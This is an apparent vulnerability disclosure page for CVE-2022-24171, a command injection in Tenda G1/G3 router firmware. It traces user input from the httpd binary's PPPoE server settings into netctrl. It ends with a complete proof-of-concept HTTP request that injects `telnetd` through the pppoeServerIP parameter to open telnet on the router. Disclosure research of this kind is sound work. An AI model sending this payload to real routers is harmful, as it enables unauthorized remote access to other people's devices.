Headline
CVE-2022-24171: my_vuln/35.md at main · pjqwudi/my_vuln
Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetPppoeServer. This vulnerability allows attackers to execute arbitrary commands via the pppoeServerIP, pppoeServerStartIP, and pppoeServerEndIP parameters.
Tenda Vulnerability
Vendor:Tenda
Product:G1、G3
Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In httpd
binary:
In formSetPppoeServer
function, An attacker can upload pictures to the router, pppoeServerIP、pppoeServerStartIP、pppoeServerEndIP
is directly passed by the attacker, so we can control the pppoeServerIP、pppoeServerStartIP、pppoeServerEndIP
to attack the OS.
First, make corresponding settings according to the selected network mode. This vulnerability occurs in the setPppoeServer
function. We mainly explain the data flow of this part.
Here, enter the function getNewPppoeServer
for the next data flow tracking.
The part that gets the user input is in the function getNewPppoeServer
.
As you can see here, in setPppoeServer
function, the input has not been checked. And then, call the function SetValue
to store this input.
This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.
In netctrl
binary:
In pppoe_server_cfg_load
function, the initial input will be extracted.
In pppoe_server_server_info_parse
function
Eventually, in pppoe_server_start
function, the initial input will cause command injection.
Supplement
The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.
PoC
We set pppoeServerIP
as telnetd
, and the router will excute it,such as:
POST /goform/setPPPoEServerBasicInfo HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 183 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/pppoeAuth/pppoeBasicSetting.html?0.9511555033319595 Cookie: _:USERNAME:_=; G3v3_user=
pppoeServerEn=true&pppoeServerIP=`telnetd`&pppoeServerStartIP=172.20.20.2&pppoeServerEndIP=172.20.20.129&pppoeServerDns1=192.168.1.252&pppoeServerDns2=223.5.5.5&pppoeServeNotifyTime=7
Result
The target router has enabled the telnet service.